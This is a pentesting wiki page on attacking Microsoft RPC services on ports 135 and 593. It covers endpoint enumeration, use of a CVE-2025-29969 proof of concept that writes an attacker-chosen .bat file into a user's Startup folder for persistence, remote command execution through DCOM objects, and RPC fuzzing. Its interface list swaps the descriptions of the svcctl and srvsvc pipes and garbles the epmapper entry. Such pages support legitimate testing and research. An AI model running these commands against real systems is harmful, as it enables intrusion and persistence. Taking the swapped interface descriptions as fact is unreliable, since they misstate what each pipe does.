135-pentesting-msrpc.md (15650B)
1 --- 2 title: "135, 593 - Pentesting MSRPC" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/135-pentesting-msrpc.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/135-pentesting-msrpc.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 135, 593 - Pentesting MSRPC 14 15 ## Basic Information 16 17 Microsoft Remote Procedure Call (MSRPC) is a client-server mechanism that lets a program invoke a procedure exposed by another process, locally or over a network, through generated stubs and runtime-selected transports. 18 19 The RPC endpoint mapper commonly listens on TCP port 135 (and historically UDP 135). RPC interfaces can also use named pipes carried over SMB on TCP 139/445, dynamic TCP endpoints learned from the mapper, or RPC over HTTP on TCP 593. 20 21 ```text 22 135/tcp open msrpc Microsoft Windows RPC 23 ``` 24 25 ## How does MSRPC work? 26 27 Initiated by the client application, the MSRPC process involves calling a local stub procedure that then interacts with the client runtime library to prepare and transmit the request to the server. This includes converting parameters into a standard Network Data Representation format. The choice of transport protocol is determined by the runtime library if the server is remote, ensuring the RPC is delivered through the network stack.<sup>[[8]](#references)</sup> 28 29  30 31 ## **Identifying Exposed RPC Services** 32 33 Exposure of RPC services across TCP, UDP, HTTP, and SMB can be determined by querying the RPC locator service and individual endpoints. Tools such as rpcdump facilitate the identification of unique RPC services, denoted by **IFID** values, revealing service details and communication bindings: 34 35 ```text 36 D:\rpctools> rpcdump [-p port] <IP> 37 **IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0 38 Annotation: Messenger Service 39 UUID: 00000000-0000-0000-0000-000000000000 40 Binding: ncadg_ip_udp:<IP>[1028] 41 ``` 42 43 Access to the RPC locator service is enabled through specific protocols: ncacn_ip_tcp and ncadg_ip_udp for accessing via port 135, ncacn_np for SMB connections, and ncacn_http for web-based RPC communication. The following commands exemplify the utilization of Metasploit modules to audit and interact with MSRPC services, primarily focusing on port 135: 44 45 ```bash 46 use auxiliary/scanner/dcerpc/endpoint_mapper 47 use auxiliary/scanner/dcerpc/hidden 48 use auxiliary/scanner/dcerpc/management 49 use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor 50 rpcdump.py <IP> -p 135 51 ``` 52 53 All options except `tcp_dcerpc_auditor` are specifically designed for targeting MSRPC on port 135.<sup>[[8]](#references)</sup> 54 55 #### Notable RPC interfaces 56 57 - **IFID**: 12345778-1234-abcd-ef00-0123456789ab 58 - **Named Pipe**: `\pipe\lsarpc` 59 - **Description**: LSA interface, used to enumerate users. 60 - **IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5 61 - **Named Pipe**: `\pipe\lsarpc` 62 - **Description**: LSA Directory Services (DS) interface, used to enumerate domains and trust relationships. 63 - **IFID**: 12345778-1234-abcd-ef00-0123456789ac 64 - **Named Pipe**: `\pipe\samr` 65 - **Description**: SAMR interface, used to enumerate permitted SAM/domain information such as users, groups, aliases, and password policy. Password guessing through any interface can trigger the target's lockout policy; do not assume SAMR bypasses it. 66 - **IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b 67 - **Named Pipe**: `\pipe\atsvc` 68 - **Description**: Task scheduler, used to remotely execute commands. 69 - **IFID**: 338cd001-2244-31f1-aaaa-900038001003 70 - **Named Pipe**: `\pipe\winreg` 71 - **Description**: Remote registry service, used to access and modify the system registry. 72 - **IFID**: 367abb81-9844-35f1-ad32-98f038001003 73 - **Named Pipe**: `\pipe\svcctl` 74 - **Description**: Server Service interface, used for operations such as enumerating shares, sessions, connections, and server configuration subject to access checks. 75 - **IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188 76 - **Named Pipe**: `\pipe\srvsvc` 77 - **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. 78 - **IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 79 - **Named Pipe**: `\pipe\epmapper` 80 - **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. 81 82 83 ### MS-EVEN (EventLog Remoting) primitives 84 85 The **MS-EVEN** RPC interface (named pipe `\pipe\even`) exposes Eventlog operations. SafeBreach’s **CVE-2025-29969 (EventLog-in)** analysis shows a **TOCTOU** flaw in MS-EVEN that lets an **authenticated low-privileged** user trigger a **remote arbitrary file write** on the target: attacker-chosen content written to an attacker-chosen path without needing Administrator rights for the remote write.<sup>[[1]](#references)[[2]](#references)</sup> 86 87 Operational pattern (PoC workflow): stage a **valid EVTX** plus your payload on an SMB share, then race the MS-EVEN logic so the target fetches the SMB-hosted file and writes it to the chosen path. 88 89 ```bash 90 impacket-smbserver -smb2support Share /tmp/safebreach 91 ``` 92 93 The published PoC uses a **hard-coded SMB share name** (`Share`), so if you change it you must also update the script. 94 95 ```bash 96 python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\Users\lowuser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\target.bat" 97 ``` 98 99 A common chain is to drop into a **per-user Startup folder** for persistence and execution on the next logon (execution occurs in that user context).<sup>[[1]](#references)</sup> 100 101 #### MS-EVEN CreateFile-style primitive for recon 102 103 MS-EVEN also exposes a **file open/create** primitive (described in the PoC as `CreateFile`) that can be used by any authenticated user to **probe whether a remote file or directory exists**. This is useful for software discovery by checking common install paths (e.g., `C:\Program Files\<Vendor>`): 104 105 ```bash 106 python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark" 107 108 Result: 109 FILE_EXISTS_AND_IS_DIRECTORY 110 ``` 111 112 ### Identifying IP addresses 113 114 The [IOXIDResolver](https://github.com/mubix/IOXIDResolver) tool, based on [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/), calls the `ServerAlive2` method on the `IOXIDResolver` interface to enumerate network bindings without authentication.<sup>[[6]](#references)</sup> 115 116 This method has been used to get interface information as **IPv6** address from the HTB box _APT_. See [here](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) for 0xdf APT writeup, it includes an alternative method using rpcmap.py from [Impacket](https://github.com/SecureAuthCorp/impacket/) with _stringbinding_ (see above).<sup>[[9]](#references)</sup> 117 118 ### Executing commands with valid credentials 119 120 When the supplied account has sufficient remote DCOM permissions, Impacket's [dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py) can execute commands through exposed DCOM objects.<sup>[[7]](#references)</sup> 121 122 **Remember to try with the different objects available** 123 124 - ShellWindows 125 - ShellBrowserWindow 126 - MMC20 127 128 ## Port 593 129 130 The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) can interact with this port. 131 132 ## Automated Fuzzing of MSRPC Interfaces 133 134 MS-RPC interfaces expose a large and often undocumented attack surface. The open-source [MS-RPC-Fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer) PowerShell module builds on James Forshaw’s `NtObjectManager` to *dynamically* create RPC client stubs from the interface metadata that is already present in Windows binaries. Once a stub exists the module can bombard each procedure with mutated inputs and log the outcome, making **reproducible, large-scale fuzzing of RPC endpoints possible without writing a single line of IDL**.<sup>[[3]](#references)[[4]](#references)</sup> 135 136 ### 1. Inventory the interfaces 137 138 ```powershell 139 # Import the module (download / git clone first) 140 Import-Module .\MS-RPC-Fuzzer.psm1 141 142 # Parse a single binary 143 Get-RpcServerData -Target "C:\Windows\System32\efssvc.dll" -OutPath .\output 144 145 # Or crawl the whole %SystemRoot%\System32 directory 146 Get-RpcServerData -OutPath .\output 147 ``` 148 149 `Get-RpcServerData` will extract the UUID, version, binding strings (named-pipe / TCP / HTTP) and **full procedure prototypes** for every interface it encounters and store them in `rpcServerData.json`. 150 151 ### 2. Run the fuzzer 152 153 ```powershell 154 '.\output\rpcServerData.json' | 155 Invoke-RpcFuzzer -OutPath .\output ` 156 -MinStrLen 100 -MaxStrLen 1000 ` 157 -MinIntSize 9999 -MaxIntSize 99999 158 ``` 159 160 Relevant options: 161 162 * `-MinStrLen` / `-MaxStrLen` – size range for generated strings 163 * `-MinIntSize` / `-MaxIntSize` – value range for mutated integers (useful for overflow testing) 164 * `-Sorted` – execute procedures in an order that honours **parameter dependencies** so that outputs of one call can serve as inputs of the next (dramatically increases reachable paths) 165 166 The fuzzer implements 2 strategies: 167 168 1. **Default fuzzer** – random primitive values + default instances for complex types 169 2. **Sorted fuzzer** – dependency-aware ordering (see `docs/Procedure dependency design.md`) 170 171 Every call is written atomically to `log.txt`; after a crash the **last line immediately tells you the offending procedure**. The result of each call is also categorised into three JSON files: 172 173 * `allowed.json` – call succeeded and returned data 174 * `denied.json` – server responded with *Access Denied* 175 * `error.json` – any other error / crash 176 177 ### 3. Visualise with Neo4j 178 179 ```powershell 180 '.\output\allowed.json' | 181 Import-DataToNeo4j -Neo4jHost 192.168.56.10:7474 -Neo4jUsername neo4j 182 ``` 183 184 `Import-DataToNeo4j` converts the JSON artefacts into a graph structure where: 185 186 * RPC servers, interfaces and procedures are **nodes** 187 * Interactions (`ALLOWED`, `DENIED`, `ERROR`) are **relationships** 188 189 Cypher queries can then be used to quickly spot dangerous procedures or to replay the exact chain of calls that preceded a crash. 190 191 ⚠️ The fuzzer is *destructive*: expect service crashes and even BSODs – always run it in an isolated VM snapshot. 192 193 194 ### Automated Interface Enumeration & Dynamic Client Generation (NtObjectManager) 195 196 PowerShell guru **James Forshaw** exposed most of the Windows RPC internals inside the open–source *NtObjectManager* module. Using it you can turn any RPC server DLL / EXE into a **fully-featured client stub** in seconds – no IDL, MIDL or manual unmarshalling required.<sup>[[3]](#references)[[5]](#references)</sup> 197 198 ```powershell 199 # Install the module once 200 Install-Module NtObjectManager -Force 201 202 # Parse every RPC interface exported by the target binary 203 $rpcinterfaces = Get-RpcServer "C:\Windows\System32\efssvc.dll" 204 $rpcinterfaces | Format-Table Name,Uuid,Version,Procedures 205 206 # Inspect a single procedure (opnum 0) 207 $rpcinterfaces[0].Procedures[0] | Format-List * 208 ``` 209 210 Typical output exposes parameter types exactly as they appear in **MIDL** (e.g. `FC_C_WSTRING`, `FC_LONG`, `FC_BIND_CONTEXT`). 211 212 Once you know the interface you can **generate a ready-to-compile C# client**: 213 214 ```powershell 215 # Reverse the MS-EFSR (EfsRpc*) interface into C# 216 Format-RpcClient $rpcinterfaces[0] -Namespace MS_EFSR -OutputPath .\MS_EFSR.cs 217 ``` 218 219 Inside the produced stub you will find methods such as: 220 221 ```csharp 222 public int EfsRpcOpenFileRaw(out Marshal.NdrContextHandle ctx, string FileName, int Flags) { 223 // marshals parameters & calls opnum 0 224 } 225 ``` 226 227 The PowerShell helper `Get-RpcClient` can create an **interactive client object** so you can call the procedure immediately: 228 229 ```powershell 230 $client = Get-RpcClient $rpcinterfaces[0] 231 Connect-RpcClient $client -stringbinding 'ncacn_np:127.0.0.1[\\pipe\\efsrpc]' ` 232 -AuthenticationLevel PacketPrivacy ` 233 -AuthenticationType WinNT # NTLM auth 234 235 # Invoke the procedure → returns an authenticated context handle 236 $ctx = New-Object Marshal.NdrContextHandle 237 $client.EfsRpcOpenFileRaw([ref]$ctx, "\\\127.0.0.1\test", 0) 238 ``` 239 240 Authentication (Kerberos/NTLM) and protection levels (`PacketIntegrity`, `PacketPrivacy`, …) can be supplied through `Connect-RpcClient`. This lets you test the access granted to a particular identity; it does not bypass a correctly enforced security descriptor. 241 242 ### Context-Aware RPC Fuzzing (MS-RPC-Fuzzer) 243 244 Static interface knowledge is useful, but deeper state requires fuzzing that understands *context handles* and parameter dependencies. The open-source **MS-RPC-Fuzzer** project automates that state-aware workflow; it is not a substitute for instrumented code-coverage feedback: 245 246 1. Enumerate every interface/procedure exported by the target binary (`Get-RpcServer`). 247 2. Generate dynamic clients for each interface (`Format-RpcClient`). 248 3. Randomise input parameters (wide strings length, integer ranges, enums) while respecting the original **NDR type**. 249 4. Track *context handles* returned by one call to feed follow-up procedures automatically. 250 5. Fire high-volume calls against the chosen transport (ALPC, TCP, HTTP or named pipe). 251 6. Log exit statuses / faults / timeouts and export a **Neo4j** import file to visualise *interface → procedure → parameter* relationships and crash clusters. 252 253 Example run (named–pipe target): 254 255 ```powershell 256 Invoke-MSRPCFuzzer -Pipe "\\.\pipe\efsrpc" -Auth NTLM ` 257 -MinLen 1 -MaxLen 0x400 ` 258 -Iterations 100000 ` 259 -OutDir .\results 260 ``` 261 262 Unexpected faults are logged with the opnum and fuzzed payload, providing a reproducible starting point for root-cause analysis. A crash alone does not establish exploitability.<sup>[[3]](#references)[[4]](#references)</sup> 263 264 > ⚠️ Many RPC services execute in processes running as **NT AUTHORITY\SYSTEM**. A reachable memory-safety flaw can therefore have high impact, including denial of service and potentially local privilege escalation or remote code execution, but exploitability depends on the bug and mitigations. 265 266 267 ## References 268 269 - [1] [EventLogin-CVE-2025-29969 (SafeBreach-Labs)](https://github.com/SafeBreach-Labs/EventLogin-CVE-2025-29969) 270 - [2] [EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows](https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/) 271 - [3] [Automating MS-RPC vulnerability research (2025, Incendium.rocks)](https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/) 272 - [4] [MS-RPC-Fuzzer – context-aware RPC fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer) 273 - [5] [NtObjectManager PowerShell module](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtObjectManager) 274 - [6] [The OXID Resolver Part 1 – Remote enumeration of network interfaces without any authentication](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) 275 - [7] [The OXID Resolver Part 2 – Accessing a remote object inside DCOM](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) 276 - [8] [MSRPC – 0xffsec Handbook](https://0xffsec.com/handbook/services/msrpc/) 277 - [9] [HTB: APT writeup (0xdf)](https://0xdf.gitlab.io/2021/04/10/htb-apt.html)